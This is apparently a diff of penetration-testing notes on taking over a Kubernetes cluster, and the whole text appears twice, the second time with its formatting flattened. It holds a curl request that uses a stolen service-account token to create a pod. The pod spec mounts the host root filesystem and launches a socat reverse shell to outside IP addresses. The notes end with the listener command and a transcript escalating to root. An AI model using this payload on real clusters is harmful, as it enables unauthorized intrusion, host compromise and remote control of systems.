dualfade · April 26, 2020 05:33
diff --git a/kubernetes pod injection -- b/kubernetes pod injection --
 Post request to cluster --
 Most articles talked about using "default" as the namespace;
 this target needed a very specific namespace to be used because of the token and privileges.

 % curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json

 yaml pod template --
 Convert to json for proper injection --
 Obviously you have to have enough privileges to use hostPath --
 This particular pen-test aws was breached compromising the kube-system jwt and then the json reverse shell was 
 injected.

 Rev shell notes --
 ngrok tcp 9000

 % cat 5h3ll3x.yaml
 apiVersion: v1
 kind: Pod
 metadata:
  name: 5h3ll3x 
 spec:
  containers:
  - name: 5h3ll3x 
    image: danilonc/blackarch 
    command: ["/bin/sh"]
    args: ["-c", 'sudo pacman -S socat --noconfirm; socat tcp-connect:3.135.90.78:18896 exec:"bash -li",pty,stderr,setsid,sigint,sane; sleep 100000']
    volumeMounts:
    - name: logs
      mountPath: /var/log/host 
  volumes:
  - name: logs
    hostPath:
      path: /
      type: Directory

 % cat 5h3ll3x.json
 {
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {
    "name": "5h3ll3x"
  },
  "spec": {
    "containers": [
      {
        "name": "5h3ll3x",
        "image": "danilonc/blackarch",
        "command": [
          "/bin/sh"
        ],
        "args": [
          "-c",
          "sudo pacman -S socat --noconfirm; socat tcp-connect:3.19.114.185:18896 exec:\"bash -li\",pty,stderr,setsid,sigint,sane; sleep 100000"
        ],
        "volumeMounts": [
          {
            "name": "logs",
            "mountPath": "/var/log/host"
          }
        ]
      }
    ],
    "volumes": [
      {
        "name": "logs",
        "hostPath": {
          "path": "/",
          "type": "Directory"
        }
      }
    ]
  }
 }

 Wait for incoming shell --

 % socat file:`tty`,raw,echo=0 tcp-listen:9000
 [user@5h3ll3x ~]$ id 
 uid=1000(user) gid=1000(user) groups=1000(user),977(sudo)
 [user@5h3ll3x ~]$ sudo su - 
 [root@5h3ll3x ~]# 

 Just some notes --
 If you run into formatting issues these two sites fix shit up well for kubernetes --

 https://onlineyamltools.com/convert-yaml-to-json
 https://onlineyamltools.com/prettify-yaml

 Good refs --
 https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-1/
 https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-2/
 https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-3/
 https://www.roguesecurity.in/2020/03/11/attacking-and-defending-kubernetes-cluster/
 https://github.com/geerlingguy/k8s-pod-rbac-breakout
 https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/
 https://www.devopsgroup.com/blog/hacking-aws-blog/
	Post request to cluster --
	Most articles talked about using "default" as the namespace;
	this target needed a very specific namespace to be used because of the token and privileges.

	% curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json

	yaml pod template --
	Convert to json for proper injection --
	Obviously you have to have enough privileges to use hostPath --
	This particular pen-test aws was breached compromising the kube-system jwt and then the json reverse shell was
	injected.

	Rev shell notes --
	ngrok tcp 9000

	% cat 5h3ll3x.yaml
	apiVersion: v1
	kind: Pod
	metadata:
	name: 5h3ll3x
	spec:
	containers:
	- name: 5h3ll3x
	image: danilonc/blackarch
	command: ["/bin/sh"]
	args: ["-c", 'sudo pacman -S socat --noconfirm; socat tcp-connect:3.135.90.78:18896 exec:"bash -li",pty,stderr,setsid,sigint,sane; sleep 100000']
	volumeMounts:
	- name: logs
	mountPath: /var/log/host
	volumes:
	- name: logs
	hostPath:
	path: /
	type: Directory

	% cat 5h3ll3x.json
	{
	"apiVersion": "v1",
	"kind": "Pod",
	"metadata": {
	"name": "5h3ll3x"
	},
	"spec": {
	"containers": [
	{
	"name": "5h3ll3x",
	"image": "danilonc/blackarch",
	"command": [
	"/bin/sh"
	],
	"args": [
	"-c",
	"sudo pacman -S socat --noconfirm; socat tcp-connect:3.19.114.185:18896 exec:\"bash -li\",pty,stderr,setsid,sigint,sane; sleep 100000"
	],
	"volumeMounts": [
	{
	"name": "logs",
	"mountPath": "/var/log/host"
	}
	]
	}
	],
	"volumes": [
	{
	"name": "logs",
	"hostPath": {
	"path": "/",
	"type": "Directory"
	}
	}
	]
	}
	}

	Wait for incoming shell --

	% socat file:`tty`,raw,echo=0 tcp-listen:9000
	[user@5h3ll3x ~]$ id
	uid=1000(user) gid=1000(user) groups=1000(user),977(sudo)
	[user@5h3ll3x ~]$ sudo su -
	[root@5h3ll3x ~]#

	Just some notes --
	If you run into formatting issues these two sites fix shit up well for kubernetes --

	https://onlineyamltools.com/convert-yaml-to-json
	https://onlineyamltools.com/prettify-yaml

	Good refs --
	https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-1/
	https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-2/
	https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-3/
	https://www.roguesecurity.in/2020/03/11/attacking-and-defending-kubernetes-cluster/
	https://github.com/geerlingguy/k8s-pod-rbac-breakout
	https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/
	https://www.devopsgroup.com/blog/hacking-aws-blog/